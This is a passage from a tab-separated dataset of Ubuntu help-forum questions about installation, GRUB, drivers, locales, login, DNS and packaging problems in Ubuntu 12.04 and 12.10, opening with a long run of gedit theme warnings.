'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:132:22 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:166:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:168:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:183:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:207:15 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:207:17 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:207:21 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme directory actions/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory status/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/16 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory actions/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory status/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/22 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/24 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory actions/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory status/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/32 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory actions/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory status/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/48 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory actions/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory status/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/64 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory actions/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory animations/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory apps/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory categories/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory devices/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory emblems/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory mimetypes/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory places/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory status/96 of theme malys-uniblue has no size field ( gedit:637 ) : gtk-warning ** : theme directory stock/96 of theme malys-uniblue has no size field
205350	remove `` install ubuntu '' menu on persistent usb stick ?	i used the lili software to create a persistent live ubuntu install on my usb stick , and everything appears to be running fine . however , whenever i boot the pc , ubuntu always prompts me with the `` install ubuntu '' ( or try it ) menu , instead of sending me to a login screen . i 've already added a couple new user accounts , and i created some test files to ensure the persistent memory is working , but i ca n't find a way to disable the menu . is there a way to remove that menu without actually installing to the usb stick ( and to just keep it in persistent live mode ) ?
205353	use spanish only in libreoffice	i tried to use spanish in libreoffice , but it wo n't work . the spain language pack is installed . if i enable it , my complete ubuntu installation is in spanish , but not in libreoffice . i tried to use spanish via libreoffice extension , but spanish is nowhere to be found . please help me .
205355	unmet dependencies 12.04 lts	sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libcogl5 ( > = 1.7.4 ) but it is not installable depends : libmuffin0 ( > = 1.0.0-0ubuntu1~precise ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
205358	grub menu is always displayed - ubuntu 12.10 with full disk encryption	update : it seems to have been fixed now , i am no longer getting the grub menu , please mark this as closed . i have ubuntu 12.10 installed with full disk encryption ( fresh install ) , the issue is that the grub menu is always displayed , i am not able to set the timeout to 0 and default it to ubuntu . i only have one os installed , there is no need for the grub menu , also there is no timer on the menu , i.e its displayed forever until i select ubuntu . i tried updating the grub config /etc/default/grub to set the timeout to 0 , but nothing works : ( grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 the contents of /boot/grub/grub.cfg ~ â cat /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if loadfont unicode ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_in insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=0 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-72be0f39-6fe6-43dd-8ea0-314c73e8e238 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 53782a70-4418-4b61-a7fc-a147ba166ca1 else search -- no-floppy -- fs-uuid -- set=root 53782a70-4418-4b61-a7fc-a147ba166ca1 fi linux /vmlinuz-3.5.0-17-generic root=/dev/mapper/ubuntu-root ro quiet splash $ vt_handoff initrd /initrd.img-3.5.0-17-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-72be0f39-6fe6-43dd-8ea0-314c73e8e238 ' { menuentry 'ubuntu , with linux 3.5.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-advanced-72be0f39-6fe6-43dd-8ea0-314c73e8e238 ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 53782a70-4418-4b61-a7fc-a147ba166ca1 else search -- no-floppy -- fs-uuid -- set=root 53782a70-4418-4b61-a7fc-a147ba166ca1 fi echo 'loading linux 3.5.0-17-generic ... ' linux /vmlinuz-3.5.0-17-generic root=/dev/mapper/ubuntu-root ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /initrd.img-3.5.0-17-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-recovery-72be0f39-6fe6-43dd-8ea0-314c73e8e238 ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 53782a70-4418-4b61-a7fc-a147ba166ca1 else search -- no-floppy -- fs-uuid -- set=root 53782a70-4418-4b61-a7fc-a147ba166ca1 fi echo 'loading linux 3.5.0-17-generic ... ' linux /vmlinuz-3.5.0-17-generic root=/dev/mapper/ubuntu-root ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /initrd.img-3.5.0-17-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 53782a70-4418-4b61-a7fc-a147ba166ca1 else search -- no-floppy -- fs-uuid -- set=root 53782a70-4418-4b61-a7fc-a147ba166ca1 fi linux16 /memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 53782a70-4418-4b61-a7fc-a147ba166ca1 else search -- no-floppy -- fs-uuid -- set=root 53782a70-4418-4b61-a7fc-a147ba166ca1 fi linux16 /memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
205375	beats audio 4 speakers + subwoofer not working on dv7 6165us and ubuntu 12.04	i see a lot of people have issues with beatsaudio on hp laptops , and they solve them partially/totally editing the /etc/modprobe.d/alsa-base.conf file . however , none of those fixes have worked for me ( a guy suggested them to me in the irc chat also ) . the problem is that this laptop has two speakers in front , two down the screen and a small subwoofer down the case . the problem is that the two front speakers and the subwoofer do n't work at all , thus causing my music and any other sounds bassless ( and being a big electronic music fan , i can tell you that 's awful ) . i dual boot with win8 and i had the same issue there , but quickly fixed it installing the idt high definition codec driver from the hp support center , which is seemingly not available for linux at all . the strange thing is that it does n't seem to be a driver issue , since if i plug some quality headphones , the bass is there , so the audio codec/soundcard is processing all the sound properly , it is just not sending it through the appropiate channels . in case it is useful , my laptop specs : http : //www.cnet.com/laptops/hp-pavilion-dv7-6165us/4505-3121_7-34800415.html
205376	ubuntu 12.10 unity wo n't start on startup	i 've just updated to ubuntu 12.10 from 12.04 , and now unity wo n't automatically start on startup ! i have to get around this problem every time i start my machine by pressing control+alt+t to get a pseudo-terminal , and starting unity manually . how do i make ubuntu 12.10 automatically start on startup ? also , is anyone else experience my problem ?
205378	'unsupported locale setting ' fault by command-not-found	i recently installed ubuntu 12.10 by keeping the home folders from linux mint 13 distribution . the system installed fine , but at the beginning everything was in chinese ( even the text in the terminal ) . i managed to solve that by editing some files , but i still get an error whenever a command is not found in terminal . here it is : sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.3 python version : 3.2.3 final 0 distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal exception information : unsupported locale setting traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/commandnotfound/util.py '' , line 24 , in crash_guard callback ( ) file `` /usr/lib/command-not-found '' , line 69 , in main enable_i18n ( ) file `` /usr/lib/command-not-found '' , line 40 , in enable_i18n locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python3.2/locale.py '' , line 541 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting how can i get rid of this error . it says that it is a locale error , so i guess it might be related to the initial language problem , but i 'm not an expert in linux stuff . what is your opinion ?
205385	starts installing then hangs	i used both ubuntu 12.10 and 12.04 the live cd runs great but when i go to install either one it starts installing then hangs , not sure whats going on but i let it sit over night even and still was on black screen showing ubuntu mouse curser in motion.. but like i said it runs great on live cd , i 'm able to use the internet and everything else but it hangs while installing . i 'm using a clean hard drive with nothing on it.. is there something im missing ? i tried using usb stick install a
205391	reset webcam settings to defaults	i installed camorama as part of a test on video capture performance under xubuntu 12.04 . i played around with some of the effects settings -afterward i realized that camorama does n't apply image processing to the frames it reads from the webcam , instead it appears to alter some settings on the webcam device itself , as every other app that uses the webcam now shows the video feed with same tint / contrast etc as set under camorama . i tried to reset the settings in camorama without any look , i tried to set the settings to look some way normal also without any luck ! is there some other way ?
205392	`` dm-tool lock '' does n't lock my session	when i use dm-tool to lock the screen for usera , i can log in as userb and then use dm-tool to switch back to usera 's session without having to enter a password . is that the expected behavior ? if not , how should i switch from a to b without leaving usera exposed ? usera $ dm-tool lock -- > shows greeter . login as userb . userb $ dm-tool switch-to-user usera -- > expected this to go to greeter , but it goes right back to usera 's session . do i have something mis-configured , or what ?
205401	use noveau nvidia driver instead of proprietary driver	i would like to try the noveau driver instead of the proprietary nvidia driver . no problem with the proprietary one , but i would like to see a proper linux kubuntu splash screen , which requires kernel graphics support . please provide me with a solution so i can `` go back '' to proprietary if the open ones ca n't support google earth for example .
205402	intelectual property of files uploaded to ubuntu one	ubuntu , i am an artist thinking about using ubuntu one to back up my art / photos / other work . i have a very important question about the files and photos that i upload to ubuntu one : do i lose any rights of ownership by uploading the images and files to ubuntu one ? i want to make sure that the files and images that i upload are still my property , and that ubuntu has no right to use or sell them for any reason . thank you in advance for your prompt response . ~emily
205403	quickly with python 3 *or* how to start a quickly app without quickly run	since ubuntu 12.10 ships only python 3 by default , i wanted to ask , what steps should be taken to get my âťquicklyâť application ready for python 3 ? i already know about 2to3 , but i do n't know how to start quickly 's quickly run command with python 3 support or how to run my applicaton without quickly . actually right now i use quickly merely to start my application , because i could'nt figure out how to run a quickly application without quickly run . i appreciate every answer !
205404	problem to get inside another os ( windows 7 )	i have intalled ubuntu and windows 7 in my laptop . when i select windows 7 loader , this screen appears : bootmgr is missing press ctrl+alt+del to restart . but my ubuntu works fine.i then update the grub there i got the message : generating grub.cfg found linux image : /boot/vmlinuz-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin grub-probe : error filesystem found windows 7 ( loader ) on dev/sda5 done but ca n't access windows 7 yet what to do now ?
205408	login screen does n't prompt for password	i just installed ubuntu 12.10 , and tied it to my company ldap . on the login screen , instead of prompting for a password there is just a `` log in '' button by my name . i click it , and i am immediately logged in without typing in a password . i checking my user account options , and `` automatic login '' is turned off . i can also click on other ldap users accounts , and get in without a password . there is a local user on the system . when i try to log in as that user , i am prompted for a password .
205409	sbackup fails to connect via ssh when run via sudo	i prefer to run sbackup via sudo to be able to backup other things than my normal user has access to . but sbackup fails to connect to the specified host via ssh when it is run via sudo . it says unable to mount host still i have no problem to ssh into the specified host with my normal user . is there any way to fix this ?
205420	12.04 ambiance dark side bar issue when clicking folder on desktop	concerning an updated custom ambiance theme : why is there no dark side bar when i click on a folder , like the home folder icon on the desktop , but the theme works as planned when i type nautilus in the terminal to open the home folder or when opening a folder up as root ? permissions issue perhaps ? note : i am using cinnamon instead of unity and i noticed it uses the nemo file manager instead of nautilus and i suspected that it was causing me the grief . i uninstalled it and now am using nautilus only as the file manager . i found this out when i typed : sudo killall nemo and the problem went away . i 'll see how this goes ( and hopefully cinnamon does n't care about it ... ) has anyone else had any issues with this ?
205421	is it possible to zip changed files into a separate archive with only the changed files	if i zip a folder , make changes to the normal unzipped files and then zip that folder again , is it possible to have only those changed files in a new separate archive ? so first zip command would be : zip -r folder.zip * second one something like : zip -r -u folder.zip * < changedfilesonly.zip // would save output
205424	`` awebrowser '' pop up is blocking my internet access with ubuntu	i have a dell netbook with ubuntu loaded onto it . when i try to access the internet , a dialog box pops up that says : awebrowser can not be located . or something of that nature . how can i get rid of this that is blocking me from accessing the internet ?
205426	how can i get and install intel gma hd driver on acer aspire one d255	how can i get and install intel gma hd driver on acer aspire one d255 ? i 'm using ubuntu 12.10 quantal i386
205427	simple scan not working after upgrading to 12.10 ( xubuntu )	since upgrading to 12.10 ( xubuntu ) , simple scan is not working anymore . i got scanning working with xsane , but only if simple scan has not run before . otherwise i have to restart the printer/scanner ( hp officejet j5783 ) . in kernel.log i see : kernel : [ 1214.120964 ] usb 2-1.4 : > usbfs : process 4412 ( simple-scan ) did not claim interface 2 before use and in syslog simple-scan : io/hpmud/dot4.c 172 : unable to read dot4reversecmd header : no data available simple-scan : io/hpmud/musb.c 1933 : invalid dot4credit from peripheral simple-scan : io/hpmud/dot4.c 172 : unable to read dot4reversecmd header : no data available simple-scan : io/hpmud/musb.c 1933 : invalid dot4credit from peripheral simple-scan : sane_hpaio_cancel : already cancelled ! simple-scan : io/hpmud/dot4.c 172 : unable to read dot4reversecmd header : no data available simple-scan : io/hpmud/musb.c 1933 : invalid dot4credit from peripheral simple-scan : io/hpmud/dot4.c 231 : unable to read dot4reversereply header : no data available bytesread=0 simple-scan : io/hpmud/dot4.c 319 : invalid dot4initreply retrying command ... simple-scan : io/hpmud/dot4.c 172 : unable to read dot4reversecmd header : no data available simple-scan : io/hpmud/musb.c 1933 : invalid dot4credit from peripheral simple-scan : io/hpmud/hpmud.c 342 : device_cleanup : device uri=hp : /usb/officejet_j5700_series ? serial=cn81lcv0v604tc simple-scan : io/hpmud/hpmud.c 354 : device_cleanup : close device dd=1 ... simple-scan : io/hpmud/hpmud.c 356 : device_cleanup : done closing device dd=1 any ideas ?
205429	how to add workspace indicator in unity/metacity ?	is there a way i can add workspace indicator in unity/metacity ? i 'm trying to find how to enable it using gconf-editor or gconftool-2 in a way similar to what 's shown here
205430	how do i add my ubuntu computer to my windows 7 network ?	i installed ubuntu 12.10 on a computer and accessed the wireless network on which i have primary and secondary computers running on windows 7 . i can see both computer icons on all computers except i can not see the ubuntu computer on the network . how do i add it to the network ?
205432	netbeans for c++ ( gcc 64bit )	how can i make netbeans work with the gcc 64 bit compiler ?
205436	add paypal donate button to c++ application	is it possible to add paypal donate button to any application which i develop for ubuntu . i 'm asking it for c++ because i 'm c++ developer .
205438	where does shotwell store its config files ?	does anybody have an idea where does shotwell store its config files ? the problem is : i made a new installation of 12.10 , and decided to use a new hdd for the home directory . i moved all pictures from the old hdd to the new one and copied all files from ~/.gconf/apps/shotwell to the new home folder , but shotwell does n't see the folder with pictures .
205439	ca n't see new unity spread since upgrade to 12.10	that 's the problem , i upgraded my ubuntu from 12.04 to 12.10 yesterday . i 've read lots of articles where is said that `` the new spread is so cool '' and stuff , but i ca n't see it properly . for example , it should look like this : but instead , what i see is this : as you can see , there are some differences , for example , i ca n't see the `` ghost new window option '' . so , is there a way to fix this ? may be upgrade some package , or something , i do n't know ...
205441	how do i set up local joomla sites for web developing ?	i plan to develop multiple websites using joomla . i 'm using ubuntu desktop , and only need to access the sites and configuration files locally , while logged in to my user account . previously i tried this using tasksel and set up a lamp server with files in /var/www , but then encountered problems with developing more than one site , and also permissions issues when editing code like css files . how do i set up multiple joomla sites , each in its own directory and database , for developing on a local desktop machine ? do i even need directories outside of /home ? related questions here ( simplest way to add & edit files in /var/www ) and here ( avoid sudo when working in /var/www ) . this might even be a duplicate of one of those , unless there is a simpler solution for web developers .
205446	scale / spread shows windows from all workspaces in 12.10	i used ubuntu tweak to set up the lower left corner of my screen to activate scale/spread/show_windows/whatever_it's_called . when i upgraded to 12.10 , it now shows all open windows from all work-spaces . it used to show only windows from the current workspace . however , when i use super-w to do the same thing , it only shows windows from the current workspace . what is going on here ? this feature is one of the main reasons that i use unity ( along with dash and hud ) , and without it working properly my productivity is hurt a lot . does anyone have a direction that i could look in to fix this ?
205448	change user name	recently i 've added new accounts in my pc , and for one of those need to change name : i 've try to change it by `` graphical procedure '' from `` account manager menu '' but change only the name in login screen and near the clock . if i open a terminal the name remain the old one . i need to have this situation from old name : franco @ pc-casa : ~ $ -- -- - > i want obtain new name : francesco @ pc-casa : ~ $ o how i can do this without create a new one user and transfer all data ? can you explain me step by step the procedure ?
205449	running from usb flash drive and ca n't install teamviewer	i am running ubuntu from a usb flash drive and i am trying to install team viewer . i get this error message : dependency is not satisfiable : ia32-libs . i am not very tech savvy , can you help ?
205455	`` shutdown '' button on desktop ?	i just uninstalled opensuse 12.2 from my sony vaio laptop because the os offered no `` shutdown '' button on the desktop . i had to log out , and then just hold the laptop 's power button down 'til the laptop shut off . does ubuntu 12.x offer such a button or similar ?
205459	how do i suppress the `` new release '12.10 ' available '' message ?	when i ssh into my mythbuntu box , i get this message : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-32-generic x86_64 ) * documentation : https : //help.ubuntu.com/ new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it . last login : < redacted > $ but i do n't intend to upgrade to 12.10 , because mythbuntu recommends using lts releases only . how do i suppress the `` new release '12.10 ' available '' message ? i do n't want to be notified until the next lts release is available . i 've already gone to update manager > settings > updates and selected `` notify me of a new ubuntu version : for long-term support versions '' , but that did n't get rid of this message .
205462	cycle through clients on both screens in awesomewm	i am using awesomewm and have two monitors , so mod4+j and mod4+k cycle through windows on current screen only . is there a way to cycle through all windows/clients on all screens to make it work like ordinary alt+tab ?
205463	how can i disable update checking on boot ?	i 'm running off of a thumb drive with very average read/write speeds and automatic update checks makes the bootup far less pleasant . since i manually update via apt there 's truly no need to notify me like on a normal desktop . in older versions of ubuntu there was an item to disable this behavior . on 12.04 this is no longer the case . would it be the 'unattended-upgrades ' item in /etc/init.d ? if yes , would simply removing the init script would solve my problem ?
205465	the application compiz has closed unexpectedly	i 'm a newbie to linux os , i have recently installed the latest version of ubuntu 12.10 desktop 32bit on a hp-compaq d530 desktop pc , but after a restart login screen works fine , once logged in after 20/30secs i get a window prompt with the message `` the application compiz has closed unexpectedly `` i have send the report and after that i am stuck with just the wallpaper / screensaver . if any one can help me out would be grateful thanks
205468	how to get al the disk space for ubuntu 12.04	recently i changed for linux ubuntu 12.04 , i left windows and i want now to get all my hard disk space , cause when i formatted my pc installing ubuntu 12.04 , i only gave ubuntu 23.0 gb and now i 'm only using ubuntu 12.04 and i want to get all my hard disk space ( before called windows ; hard drive c and hard drive d ) . how can i do this ? do i have to use terminal ? thanks .
205474	ubuntu dns back to normal	yesterday , i change my dns into google dns because my isp has place so many restriction.. so i edit my resolv.conf file and it 's look like this.. # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten # nameserver 127.0.1.1 nameserver 8.8.8.8 nameserver 8.8.4.4 but , when i login in my ubuntu , i try to look at my favourite site , but it 's show could not connected , so i begins to suspect with my dns , so i look back , and suprisingly , it 's become normal back.. # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 so my question , how to make this file do n't revert to using default dns ? i want google dns , not my isp dns.. i 'm using new ubuntu 12.10 , in 12.04 , this problem does n't occur..
205476	ubuntu 12.10 create empty document shortcut	i have just learned how to assign shortcut to `` create new empty document '' in nautilus . i followed stevelove here shortcut works well but only in nautilus . is there any possibility how to enable this shortcut on my desktop ?
205480	how to create a .deb file just for copying certain icons and one javascript file to particular locations ?	okay , so i have wasted my whole day and still unable to figure out how to do that the easy way.i have been to the debian land and ubuntu packaging land.i have read about equivs and various other ways but still no progress.those are all bulky pieces of texts.is creating a .deb to do such a small/easy thing is that much difficult in ubuntu/debian ?
